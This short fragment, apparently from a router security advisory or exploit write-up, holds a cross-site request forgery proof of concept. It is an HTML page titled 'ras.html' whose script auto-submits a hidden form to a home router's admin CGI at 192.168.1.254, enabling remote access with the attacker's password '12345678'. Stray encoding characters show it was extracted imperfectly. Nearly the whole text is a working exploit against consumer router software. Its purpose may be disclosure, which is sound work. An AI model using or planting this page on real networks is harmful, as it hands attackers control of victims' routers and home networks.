çEnable
remote access with attacker’s credentials (‘12345678’)
¼<html> <!-- ras.html --> <head></head>
<body> <form name='raccess' action='http://192.168.1.254/cgi/b/ras//?ce=1&be=1&l0=5&l1=5'
method='post'>
<input
type='hidden' name='0' value='31'>
<input
type='hidden' name='1' value=''>
<input
type='hidden' name='30‘ value='12345678'>
</form> <script>document.raccess.submit();</script>
</body> </html>